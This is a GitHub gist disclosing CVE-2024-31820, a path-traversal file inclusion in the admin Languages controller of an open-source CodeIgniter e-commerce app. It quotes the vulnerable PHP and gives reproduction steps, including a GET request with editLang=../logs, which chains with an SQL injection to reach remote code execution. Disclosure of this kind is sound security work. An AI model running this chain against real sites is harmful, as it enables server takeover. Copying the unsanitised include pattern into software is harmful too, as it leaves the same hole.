Skip to content

Instantly share code, notes, and snippets.

@LioTree

LioTree/CVE-2024-31820.md

Created April 28, 2024 12:43
Show Gist options
  • Save LioTree/890b0eea95fce6225d820afe4e3510e9 to your computer and use it in GitHub Desktop.
Save LioTree/890b0eea95fce6225d820afe4e3510e9 to your computer and use it in GitHub Desktop.
Download ZIP
CVE-2024-31820
Raw
CVE-2024-31820.md

vendor: kirilkirkov/Ecommerce-CodeIgniter-Bootstrap (github.com)

version: before Vulnerability fixes from Lion Tree · kirilkirkov/Ecommerce-CodeIgniter-Bootstrap@d22b54e (github.com)

A file inclusion vulnerability is in getLangFolderForEdit method of application/modules/admin/controllers/advanced_settings/Languages.php. By controlling $_GET['editLang'], the attacker can make the server include .php files under specific directory. The attacker can use CVE-2024-31821 to write malicous PHP code in log-xxxx.php and use this vulnerability to include PHP files under application/logs/ (At this point, BASEPATH has been set, allowing bypass of the check at the beginning of the log file.), which leads to remote code execution.

private function getLangFolderForEdit()
    {
        $langFiles = array();
        $files = rreadDir('application' . DIRECTORY_SEPARATOR . 'language' . DIRECTORY_SEPARATOR . '' . $_GET['editLang'] . DIRECTORY_SEPARATOR);
        $arrPhpFiles = $arrJsFiles = array();
        foreach ($files as $ext => $filesLang) {
            foreach ($filesLang as $fileLang) {
                if ($ext == 'php') {
                    require $fileLang;
                    if (isset($lang)) {
                        $arrPhpFiles[$fileLang] = $lang;
                        unset($lang);
                    }
                }
                if ($ext == 'js') {
                    $jsTrans = file_get_contents($fileLang);
                    preg_match_all('/(.+?)"(.+?)"/', $jsTrans, $PMA);
                    $arrJsFiles[$fileLang] = $PMA;
                    unset($PMA);
                }
            }
        }
        $langFiles[0] = $arrPhpFiles;
        $langFiles[1] = $arrJsFiles;
        return $langFiles;
    }
if (isset($_GET['editLang'])) {
            $num = $this->Languages_model->countLangs($_GET['editLang']);
            if ($num == 0) {
                redirect('admin/languages');
            }
            $langFiles = $this->getLangFolderForEdit();
        }
public function countLangs($name = null, $abbr = null)
    {
        if ($name != null) {
            $this->db->where('name', $name);
        }
        if ($abbr != null) {
            $this->db->or_where('abbr', $abbr);
        }
        return $this->db->count_all_results('languages');
    }

The steps to reproduce are as follows:

  • Add a new language called ../logs to bypass $num = $this->Languages_model->countLangs($_GET['editLang']);.

Pasted image 20240103001216

  • Use previous SQL injection vulnerability to write malicous PHP code into log file. This step needs to be done after the first step because adding language will clear log file.

  • Edit language ../logs

GET /Ecommerce-CodeIgniter-Bootstrap/admin/languages/?editLang=../logs HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost/Ecommerce-CodeIgniter-Bootstrap/admin/languages
Cookie: ci_session=inm96ingrq5a7murjrsmvjc7o7ke83jg; shopping_cart=a%3A1%3A%7Bi%3A0%3Bi%3A2%3B%7D
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

Pasted image 20240103001232

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment